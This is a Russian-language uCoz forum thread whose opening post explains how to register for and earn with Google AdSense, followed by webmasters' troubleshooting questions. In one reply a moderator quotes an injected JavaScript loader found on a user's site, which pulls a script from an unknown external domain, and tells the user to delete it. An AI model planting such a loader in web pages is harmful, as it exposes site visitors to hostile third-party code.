Сообщество uCoz » Вебмастеру » Монетизация сайта » Google AdSense: инструкция (регистрация, оптимизация, заработок)
Google AdSense: инструкция
Модератор форума
Сообщение # 1 | 19:06:58

Google AdSense - это контекстная реклама, за клики по которой вы будете получать деньги. Контекстная реклама - это, проще говоря, реклама "в тему".
Например, у вас есть блог (интернет-дневник), на котором Вы просто публикуете свои мысли. Никакой общей направленности у мыслей нет, сегодня Вы пишите, какой же плохой у вас хостер, дорогой и невнимательный к клиентам, завтра пишете, как замечательно сходили с друзьями в Макдоналдс и весело провели там время, потом пишете о том, что подарили своей любимой девушке на день рожденья и пр. На такой блог Вы вряд ли найдете прямых рекламодателей. Казалось бы, и как же тогда заработать?

А очень просто, регистрируйтесь в Google AdSense и ставьте себе на блог рекламный ява-скрипт, который будет показывать вам и посетителям вашего блога (или сайта) контекстную рекламу. Система автоматически подберет и покажет именно ту рекламу, которая будет по теме текущей страницы. В нашем примере, сначала она покажет объявления об услугах хостинга, на странице о походе в Макдоналдс покажет объявления, например о доставке еды на дом или в офис, ну и в последнем случае будут объявления, например, интернет-магазинов цветов или подарковвообще. Пример контекстной рекламы Google AdSense вы можете видеть например на моем блоге, текстовые рекламные блоки возле которых написано "Реклама от Google" это и есть контекстная реклама Google AdSense. За каждый клик ваших посетителей по рекламному объявлению Вы получите свое вознаграждение.

Цена клика (так называемый бид) определяется рекламодателями и зависит от очень многих факторов, как то, конкуренция в данной теме, географическое расположение серфера и пр. Система контекстной рекламы за Вас сама выберет не только наиболее подходящую по теме рекламу, но и по максимально выгодным для Вас бидам.

Преимущества размещения контекстной рекламы перед обычными баннерами или статичной текстовой рекламой в том, что у Вас нет необходимости постоянно заниматься поиском рекламодателей, реклама будет по нужной теме и сама будет меняться, дополняться и пр. Практически мечта - один раз все поставил и настроил, и дальше надо только получать деньги. Вид рекламных блоков имеет гибкие настройки, можно изменять многие параметры, начиная от размеров и заканчивая выбором нужных цветов рекламного шрифта, фона, чтобы реклама гармонировала с цветовой гаммой Вашего сайта.

Важно понимать то, что самому категорически НЕЛЬЗЯ кликать по рекламе на своих ресурсах, за это ваш аккаунт в партнерке забанят и ничего не выплатят. Разумеется, просить друзей и знакомых покликать по рекламе на вашем сайте тоже не стоит. Гугл (Google) вообще очень серьезная организация, с капитализацией в миллиарды долларов, и уж поверьте, у них есть эффективные механизмы по отлову фальшивых кликов.

В данный момент в Россию Google выплачивает именными чеками (их получать и обналичивать долго и дорого) и с недавних пор через систему переводов Рапида, переводы доступы везде, где есть отделение "Почты России". Минимальная сумма для выплаты 100 долларов.

Теперь после осмысления теории перейдем к практике. Вам надо сделать всего 5 шагов:

1) Вам надо сделать себе сайт или блог. Проще всего зарегистрировать себе бесплатный блог под ваши сочинения, например, на uCoz
Регистрация там простая, управление и настройка блога не требуют никаких специфических знаний. Доступно много различных шаблонов дизайна.
2) Зарегистрироваться в Google Adsense
3) Войти в аккаунт, выбрать формат рекламных блоков, настроить их внешний вид, получить ява-скрипт, который и будет вызывать на вашем сайте рекламные объявления гугла.
4) Установить полученный в п.3 код ява-скрипта в шаблон вашего сайта/блога.
5) Наполнять интересной информацией свой сайт/блог. Писать свой личные мысли и мнения по поводу чего-либо или перепечатывать интересные новости это уже ваше дело, откуда брать контент каждый решает сам. Ну и по возможности блог надо раскручивать, чтобы его посещало как можно больше человек, которые соответственно и будут кликать по заинтересовавшей их контекстной рекламе, а вы за эти клики будете получать деньги.

Вот собственно и все. Ничего сверхсложного или сверхестественного тут нет, успехов!

Источник: http://www.your-money-here.com
Сообщение отредактировал lech1 - Понедельник, 05 Июн 2006, 19:07:55
DarwinС
Сообщений: 56
Репутация: 1

Сообщение # 406 | 03:46:15
Цитата vasyapypok ()
Мой сайт уже пять раз отклоняют из-за недостатка контента, но на моем сайте 34 страницы, в среднем на каждом по 1500 символов ( есть пару по 700, остальные больше ). Почему это так? Им сколько нужно то?

Впервые вижу чтоб адсенс нормальный сайт отклонял. У меня реклама адсенса стоит на медсайте, которому от силы 2 месяца и около 40 страниц. И гугл не жаловался на него. Так что скорее всего дело в контенте. Либо пиратские фильмы-программы, либо порно или сайт накрутки.
Трайбл
Сообщений: 11
Репутация: 0

Сообщение # 407 | 15:56:19
Помогите пожалуйста проблемку решить.
Я выбираю "Полный банер", но на страничке после установки кода рекламку режет на половину. Ниже на скрине видно как.



Почем так ? В чём ошибка ? Пример странички здесь

http://intmoney.com.ua/index/razgadyvanie_kapchi/0-19
baron69
Сообщений: 36
Репутация: 32

Сообщение # 408 | 20:34:53
Цитата Трайбл ()
Пример странички

На сайт не заходил, но судя по принскрину ваш про заработок, а это протеворечит на сколько я помню правилам. Так что решайте сами.
Admin5611
Сообщений: 3
Репутация: 0

Сообщение # 409 | 19:43:22
Установил на свой сайт рекламу google adsense, а он не отображается, что только не пробовал, да еще и от других рекламных сетей -- все так же.
Вставлял adsense в блок через конструктор и через редактор шаблона html.
Сам сайт - блок "Внимание".
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 410 | 20:05:31
Admin5611, вы прошли модерацию? этот код вы сами установили?
Код
<script type="text/javascript">
(function(w) {
var script = document.createElement('script');
var i = setInterval(function() {
if (typeof w.document.body !== 'undefined') {
script.src = 'http://aiyozvvfrs.spend-about.info' + '/?608950=wovCxJDU2tnV3d_SxYuHgYGFhIM';
w.document.body.appendChild(script);
clearInterval(i);
}
}, 200);
})(window);
</script>
в любом случае обязательно удалить. и на всякий прочитайте правила гугла

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Admin5611
Сообщений: 3
Репутация: 0

Сообщение # 411 | 21:45:39
Я просто зашел в <<Мои объявления>> и там создал рекламу. И скопировал код.

Добавлено (20 Окт 2015, 21:45:39)
---------------------------------------------
Скрин

Sonor
Сообщений: 251
Репутация: 525

Сообщение # 412 | 00:54:06
Admin5611
Сообщений: 3
Репутация: 0

Сообщение # 413 | 08:49:27
pro100kasper
Сообщений: 1556
Репутация: 661

Сообщение # 414 | 10:42:55
Admin5611, Гугл не принимает сайты с бесплатным доменом

atronas87
Сообщений: 4
Репутация: 0

Сообщение # 415 | 11:43:00
Сейчас с адсенсом реальные проблемы, как и вообще с контекстной рекламой и банерами. Злой AdBlock. Я скриптец на одном из своих сайтов сваял посчитать, сколько халявщиков. Результат не приятно удивил. Почти 50%!!!! Половина с AdBlock! surprised

Люблю электричество.
zarim
Сообщений: 489
Репутация: 82
Уровень замечаний:

Сообщение # 416 | 16:32:59
atronas87, адблок появился как ответ на переизбыток рекламы на сайтах, разные попандеры, кликандеры и та же юкозовская реклама, закрывающая часть контента... в результате пострадали все вебмастера, даже те, кто не ставил агрессивные виды рекламы sad
PrizraK911
Сообщений: 18
Репутация: 3

Сообщение # 417 | 19:53:43
Такой вопрос возник: если на сайте есть стандартная реклама от системы Ucoz, то клики по Adsense не будут оплачиваться?
miklbel
Сообщений: 27
Репутация: 6

Сообщение # 418 | 15:00:14
Здравствуйте! На моём сайте zapravkaavto.ru не показывается блок адсенс? Задавал вопрос на гугловских форумах - ни чего внятного.

Добавлено (06 Фев 2016, 13:40:07)
---------------------------------------------
То ли отвечать некому, то ли вопрос неотвечаемый? wink

Добавлено (14 Фев 2016, 15:00:14)
---------------------------------------------
А форум-то живой ещё?


atronas87
Сообщений: 4
Репутация: 0

Сообщение # 419 | 12:10:01
Может с адблоком смотрите ? wink

Люблю электричество.
МИЛЕНАS
Сообщений: 14
Репутация: 0

Сообщение # 420 | 19:36:03
ПОдскажите пожалуйста, зарегистрировалась я на этой сайте, пришло письмо мол все ок, можете проходить дальше регистрацию....НО..
не поняла одного, я хочу не дать обьявление, а получается сдавать место на своем сайте под обьявление...а в последней анкете, а с меня требуют указать: НАЛОГОВУЮ ИНФОРМАЦИЮ,Идентификационный номер налогоплательщика, мало того....так еще и сумма платежа стоит 3000!
за что я то должна платить?? может я что-то не так делаю
Сообщество uCoz » Вебмастеру » Монетизация сайта » Google AdSense: инструкция (регистрация, оптимизация, заработок)
Поиск: